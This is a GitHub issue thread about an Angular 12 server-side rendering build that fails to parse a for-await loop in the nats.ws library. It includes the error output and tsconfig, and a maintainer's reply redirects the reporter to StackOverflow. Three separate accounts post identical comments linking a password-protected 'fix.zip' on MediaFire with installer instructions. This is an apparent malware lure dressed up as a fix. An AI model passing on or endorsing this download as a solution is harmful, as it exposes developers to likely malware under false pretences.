### ISSUE TITLE
Angular Universal Build Error: Module Parse Failed While Creating Server Bundle

### ISSUE THREAD

**Issue by Ramesh-Mu** [angular/angular#57523]
### Which @angular/* package(s) are the source of the bug?

Don't known / other

### Is this a regression?

No

### Description

I’m using Angular version 12 in my application and have integrated the nats.ws library. Recently, I enabled server-side rendering (SSR). When I build the application for SSR, the browser build completes without errors, but the server build throws an exception.

### Please provide the exception or error you saw

```true
./node_modules/nats.ws/esm/nats.js:7472:16 - Error: Module parse failed: Unexpected token (7472:16)
File was processed with these loaders:
 * ./node_modules/@angular-devkit/build-angular/src/babel/webpack-loader.js
 * ./node_modules/@angular-devkit/build-optimizer/src/build-optimizer/webpack-loader.js
 * ./node_modules/@ngtools/webpack/src/ivy/index.js
You may need an additional loader to handle the result of these loaders.
|         _asyncToGenerator(function* () {
|           try {
>             for await (const b of _this12.transport) {
|               _this12.parser.parse(b);
|             }
```

### Please provide the environment you discovered this bug in (run `ng version`)

```true
Angular cli: ~12.0.0
Node : 14.21.3
OS : Windows 11
Package manager : npm

TypeSript config

{
  "compileOnSave": false,
  "compilerOptions": {
    "baseUrl": "./",
    "outDir": "./dist/out-tsc",
    "forceConsistentCasingInFileNames": true,
    "strict": true,
    "noImplicitReturns": true,
    "noFallthroughCasesInSwitch": true,
    "sourceMap": true,
    "declaration": false,
    "skipLibCheck": true,
    "downlevelIteration": true,
    "experimentalDecorators": true,
    "moduleResolution": "node",
    "importHelpers": true,
    "target": "ES2016",
    "module": "es2020",
    "lib": [
      "ES2020",
      "dom"
    ],
    "typeRoots": [
      "node_modules/@types",
      "node_modules/nats.ws/lib/src",
      "node_modules/nkeys.js/lib"
    ],
    "paths": {
      "nkeys.js": [
        "node_modules/nkeys.js/nkeys.mjs",
        "node_modules/nkeys.js/lib/nkeys.d.ts"
      ],
      // "nats.ws": [
      //   "node_modules/nats.ws/cjs/nats.js",
      //   //"node_modules/nats.ws/lib/src/mod.d.ts"
      // ]
    }
  },
  "angularCompilerOptions": {
    "enableI18nLegacyMessageIdFormat": false,
    "strictInjectionParameters": true,
    "strictInputAccessModifiers": true,
    "strictTemplates": true
  }
}
```

### Anything else?

I also observe this issue with a standard build (ng build) when I change the target version to ES2017 or higher

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JeanMeche** [comment]
Hello, we reviewed this issue and determined that it doesn't fall into the bug report or feature request category. This issue tracker is not suitable for support requests, please repost your issue on [StackOverflow](https://stackoverflow.com/) using tag `angular`.

If you are wondering why we don't resolve support issues via the issue tracker, please [check out this explanation](https://github.com/angular/angular/blob/main/CONTRIBUTING.md#question).
